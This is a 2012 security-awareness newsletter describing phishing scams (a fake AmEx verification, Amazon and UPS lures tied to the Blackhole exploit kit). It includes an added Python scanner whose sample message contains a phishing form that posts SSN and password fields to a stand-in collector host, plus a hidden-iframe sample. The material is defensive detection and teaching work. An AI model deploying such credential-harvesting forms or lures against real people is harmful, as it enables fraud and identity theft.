CyberheistNews Vol 2, #39
Editor's Corner
Scam Of The Week: Fake AmEx "Security Verification"
Phishing attacks come in waves. Old ones get "refurbished" and sent out
again after several months. Shiny new ones are cooked up all the time.
Sometimes you see hybrids of old and new, and that's what is doing
the rounds at the moment. Remind all employees that they need to delete
these types of phishing attacks and not click on any unsubscribe
links!
The attack tries to make recipients open the file in the attachment and
fill out a detailed screen. The email claims to be a notification about
a "Membership Security Verification," and warns the recipient that a
"slight error" has been detected in their AmEx accounts. To correct the
error and prevent their account from getting shut down in the next 48 hours,
the recipient is urged to download the attached HTML file, open it in a
browser and fill out a boatload of information.
As you can see in this screenshot on our blog: http://blog.knowbe4.com/fake-amex-security-verification/ the criminals go whole hog and want
it all: username, address, home and work telephone numbers,
SSN#, mother's maiden name and date of birth, users' date of birth,
AmEx credit card number, expiry date, card security code, ATM PIN, email
address and the password for it. Obviously all this submitted data gets
sent to the criminal mothership and sold to the highest bidder!
New Survey Reveals: Companies Lack BYOD Security
According to new findings from KnowBe4, a Security Awareness Training firm,
and research firm ITIC, a large percentage of companies do not have security
procedures in place for Bring Your Own Device programs.
While BYOD (bring your own device) deployments have been among the biggest
trends in corporate computing usage in the last 12 to 18 months, a recent
study found that 71% of businesses that allow BYOD have no specific
policies and procedures in place to support BYOD deployment and ensure
security. The study was conducted by KnowBe4, a security awareness training
firm, and ITIC, a research and consulting firm based in the Boston area
specializing in conducting independent surveys tracking crucial trends.
Nearly two-thirds of businesses now allow end users to bring their own
devices and use them as corporate desktop or mobile devices to access
organizational data including email, applications and sensitive data. BYOD
usage does help businesses contain costs and lower the administrative burden
of IT departments as end users manage, maintain and in many cases pay for
their own devices. However, there is a huge downside to this trend: security.
Kevin Mitnick (former most-wanted hacker), KnowBe4's Chief Hacking
Officer said: "Mobile devices are the new target-rich environment. Based
on lessons learned in the early days of the personal computer, businesses
should make it a top priority to proactively address mobile security so
they avoid the same mistakes [of the PC era] that resulted in untold system
downtime and billions of dollars in economic loss."
Full Press Release here:
http://www.prweb.com/releases/2012/9/prweb9858074.htm
Please Forward This Newsletter To Your Friends
There are 40,000 people getting CyberheistNews every week, but
we need to get the word out to many more, to protect everyone's
network. Please forward this newsletter to people you know, that can
benefit. Here is the link to subscribe:
http://www.knowbe4.com/cyberheist-news/
Quotes of the Week
"Never memorize something that you can look up." - Albert Einstein
"No man has a good enough memory to be a successful liar." - Abraham Lincoln
"Nothing stands out so conspicuously, or remains so firmly fixed in the
memory, as something which you have blundered." - Marcus Tullius Cicero
Please tell your friends about CyberheistNews! They can subscribe here:
http://www.knowbe4.com/about-us/cyberheist-news/
Prevent Email Phishing
Want to stop Phishing Security Breaches? Did you know that many of the email addresses of your organization are exposed on the Internet and easy to find for cybercriminals? With these addresses they can launch spear-phishing attacks on your organization. This type of attack is very hard to defend against, unless your users are highly security awareness trained.
IT Security specialists call it your phishing attack surface. The more of your email addresses that are floating out there, the bigger your attack footprint is, and the higher the risk is. Find out now which of your email addresses are exposed with the free Email Exposure Check (EEC). An example would be the email address and password of one of your users on a crime site. Fill out the form and we will email you back with the list of exposed addresses. The number is usually higher than you think.
Sign Up For Your Free Email Exposure Check Now:
http://www.knowbe4.com/email-exposure-check/
Fake Amazon Order Phish Exploits Recent Java Vulnerability
There is a brand new phishing attack that gets sent to people and
asks them to "click here and verify your order" with Amazon.
The phish is terrible; it looks bad and certainly not like it came
from Amazon. However, the sting is in the fact that it uses the
brand new 0-day vulnerability in Java together with the infamous
Blackhole Exploit kit. Example and more details at the Websense blog:
http://community.websense.com/blogs/securitylabs/archive/2012/09/03/amazon-order-email-campaign-lead-to-blackhole-utilizing-new-java-vulnerability.aspx
New Windows 8 Survey: Excited Or Underwhelmed?
Microsoft will officially launch Windows 8 on October 26. Are you excited
or underwhelmed? What do you think of the Metro interface? We would like
your opinion. We've created a short survey; it's just 12 questions and
should take you only about five minutes to complete. All responses are kept
confidential. And once again, anyone who completes the survey and leaves
an essay comment is eligible to win a free iPad or iPod. To be eligible
to win the prizes you must leave your Email address along with your comment
in the Question 12 comment box. No sales people will call you and we never
share your information with anyone. Here's the link to the survey:
https://www.surveymonkey.com/s/V7M28M8
We will publish the survey results in this newsletter. In addition, anyone
who completes the survey and would like a complimentary copy of the ITIC
full Windows 8 Report can Email Laura DiDio directly at: ldidio@itic-corp.com
Thanks in advance for your participation! -- Laura & Stu
Wire Transfer Confirmation Phish Leads To Infections
Any employee who is responsible for wire and ACH transfers should get
a quick reminder about this attack. Webroot reports that over the past
24 hours, cybercriminals started spamvertising millions of emails
impersonating the United Parcel Service (UPS) in an attempt to trick
end users and corporate users into previewing a malicious .html attachment.
Upon previewing it, a tiny iFrame attempts to contact a landing URL
serving client-side exploits, courtesy of the Black Hole web malware
exploitation kit. More at Webroot:
http://blog.webroot.com/2012/09/04/spamvertised-wire-transfer-confirmation-themed-emails-lead-to-black-hole-exploit-kit/
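Both the AmEx item and this one rely on an .html attachment: one carries a data-collection form, the other a tiny iFrame. The following is an added example (not from Webroot, Websense or KnowBe4) of a mail-gateway style check that flags both patterns; the field-name hints, the 2-pixel threshold and the sample message with its example.test hostnames are assumptions made up for illustration.

```python
import email, re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

SENSITIVE = ("ssn", "pin", "cvv", "password", "maiden")  # assumed field-name hints
# Constructed sample message; the hostnames are placeholders.
SAMPLE = """\
Subject: Membership Security Verification
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html
Content-Disposition: attachment; filename="verification.html"

<form action="http://collector.example.test/save" method="post">
<input name="ssn"><input type="password" name="email_pw"></form>
<iframe src="http://landing.example.test/" width="1" height="1"></iframe>
--b1--
"""

class Scanner(HTMLParser):
    """Flags remote-posting forms, sensitive inputs and near-invisible iframes."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}
        name = a.get("name", "").lower()
        if tag == "form" and urlparse(a.get("action", "")).scheme in ("http", "https"):
            self.findings.append(("remote-form", a["action"]))
        elif tag == "input" and (a.get("type", "").lower() == "password"
                                 or any(s in name for s in SENSITIVE)):
            self.findings.append(("sensitive-field", name))
        elif tag == "iframe":
            tiny = any(re.fullmatch(r"[0-2](px)?", a.get(k, "")) for k in ("width", "height"))
            if tiny or "display:none" in a.get("style", "").replace(" ", "").lower():
                self.findings.append(("hidden-iframe", a.get("src", "")))

def scan_message(raw):
    """Return (filename, kind, detail) for each finding in HTML attachments."""
    msg = email.message_from_string(raw, policy=policy.default)
    out = []
    for part in msg.iter_attachments():
        if part.get_content_type() == "text/html":
            s = Scanner()
            s.feed(part.get_content())
            out += [(part.get_filename(), k, d) for k, d in s.findings]
    return out
```

Calling scan_message(SAMPLE) returns four findings for verification.html. The substring hints are deliberately loose ("pin" also matches "shipping"), so treat hits as a reason to quarantine and review rather than as a verdict.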
Cyberheist 'FAVE' LINKS:
* This Week's Links We Like. Tips, Hints And Fun Stuff.
Low altitude canyon flying in an F-18 through Northern California and Oregon:
http://www.flixxy.com/beautiful-f-18-low-altitude-canyon-flying.htm
Software engineer Tom Gonzales spent 5 million dollars - including the
aircraft-carrier elevator platform - to create one of the most expensive
and incredible garages ever built:
http://www.flixxy.com/5-million-dollar-underground-garage.htm
People Are Super Awesome. The latest compilation of super-awesome feats
by some of the most accomplished athletes on the planet:
http://www.flixxy.com/people-are-super-awesome.htm
What happens when you pour lava onto ice? You would think that molten
lava being so hot (2,100 °F) would just melt through the ice. Not so:
http://www.flixxy.com/what-happens-when-you-pour-lava-onto-ice.htm
From the weird Japanese websites department. Ever seen these wiggly pictures
and ASCII art? My favorite ASCII one with cats is in the middle of the page:
http://weekly.ascii.jp/elem/000/000/040/40893/
BMW has figured out a clever way to promote its rear-view cameras:
http://www.flixxy.com/caught-in-rearview-camera.htm
Here is a handy tip for anyone who needs to separate eggs for cooking or baking:
http://www.flixxy.com/how-to-separate-eggs-using-a-plastic-bottle.htm
A humpback whale makes a surprise appearance to canoers close to the coast
of San Luis Obispo in California:
http://www.flixxy.com/humpback-whale-vs-2-women-in-kayaks.htm
A wind turbine that creates fresh water out of thin air:
http://www.flixxy.com/turbine-turns-wind-into-water.htm
Hope this never happens to me! The Missouri Highway Patrol releases dash-cam
video as troopers escort a driver in a Kia Sorento who said her accelerator
got stuck on Interstate 35. Some good hints about how to fix this:
http://www.flixxy.com/troopers-escort-driver-after-accelerator-gets-stuck.htm
Even if you're a social media recluse, advanced software algorithms can
glean a surprising amount of detail about your life:
http://www.flixxy.com/how-the-internet-can-read-your-mind.htm